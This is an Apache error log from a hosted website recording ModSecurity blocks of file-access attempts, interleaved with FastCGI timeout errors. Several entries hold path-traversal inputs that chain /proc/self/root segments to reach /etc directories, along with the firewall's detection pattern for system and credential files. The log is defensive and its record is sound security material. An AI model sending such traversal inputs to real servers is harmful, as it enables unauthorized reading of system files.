[Tue Mar 17 17:44:34.987588 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.31:47286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9MgeiSKl8TjouI-YtKgAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:44:49.787063 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:45666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9QaBJNF7axNlVR0UuAAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:44:53.137786 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48476] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:44:54.458077 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.31:45670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9RqBJNF7axNlVR0UuCQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:44:57.059576 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:45678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9SQeiSKl8TjouI-YtLQAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:45:02.328029 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:47268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9Tta6ubjKNq_cu4YdHwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:45:03.785406 2026] [core:alert] [pid 25836:tid 140411599251200] [client 74.7.243.128:38540] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/tuned
[Tue Mar 17 17:45:05.839582 2026] [:error] [pid 25836:tid 140411741927168] [client 216.73.216.191:3222] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9UYh-PF_25v4hFRCAGAAAAQA"]
[Tue Mar 17 17:45:15.686169 2026] [proxy_fcgi:error] [pid 7437:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48912] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:45:38.045944 2026] [proxy_fcgi:error] [pid 25836:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49298] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:46:00.137733 2026] [proxy_fcgi:error] [pid 7437:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:46:24.125782 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49758] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:46:51.121807 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:47:14.117779 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50436] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:47:36.129797 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:48:00.146297 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:47280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-AIh-PF_25v4hFRCAZwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:48:00.146705 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51078] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:48:02.707423 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:37208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-AnIk7brgkOH-rIWiOAAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:48:24.767182 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:36374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-GKBJNF7axNlVR0UuQAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:48:25.138752 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51356] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:48:47.133823 2026] [proxy_fcgi:error] [pid 29151:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51638] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:49:09.125795 2026] [proxy_fcgi:error] [pid 29151:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:49:34.131711 2026] [proxy_fcgi:error] [pid 29151:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52388] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:49:35.315459 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:34272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-X3Ik7brgkOH-rIWiWgAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:49:57.125995 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52818] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:50:18.129976 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53204] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:50:18.161332 2026] [:error] [pid 2473:tid 140411716749056] [client 216.73.216.191:49653] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-iqBJNF7axNlVR0UuWgAAAAM"]
[Tue Mar 17 17:50:34.933971 2026] [:error] [pid 29151:tid 140411649607424] [client 216.73.216.191:52366] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-mvPqhzTj3BvfDX-dTAAAAcs"]
[Tue Mar 17 17:50:40.125815 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53498] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:50:41.897094 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:57994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-oeyqAr6etmhZHNo87AAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:50:55.157567 2026] [:error] [pid 25836:tid 140411741927168] [client 216.73.216.191:64268] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-r4h-PF_25v4hFRCAmgAAAQA"]
[Tue Mar 17 17:51:05.125871 2026] [proxy_fcgi:error] [pid 7004:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53734] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:51:27.120294 2026] [proxy_fcgi:error] [pid 7004:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53980] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:51:29.131302 2026] [:error] [pid 25836:tid 140411548894976] [client 74.7.243.128:47384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-0Yh-PF_25v4hFRCApwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:51:37.665024 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:50204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm-2dY0UrI5A3LftIwTSgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:51:49.125821 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54264] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:52:12.101828 2026] [proxy_fcgi:error] [pid 29151:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54428] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:52:36.729983 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:44742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm_FNY0UrI5A3LftIwTaQAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:52:39.126434 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54792] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:53:02.073846 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55244] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:53:19.631115 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.243.128:34660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm_P8U6Sx0TG1YjmQjEcQAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:53:25.045876 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55812] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:53:47.109808 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56152] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:54:11.125772 2026] [proxy_fcgi:error] [pid 29151:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56438] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:54:12.262063 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:55054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 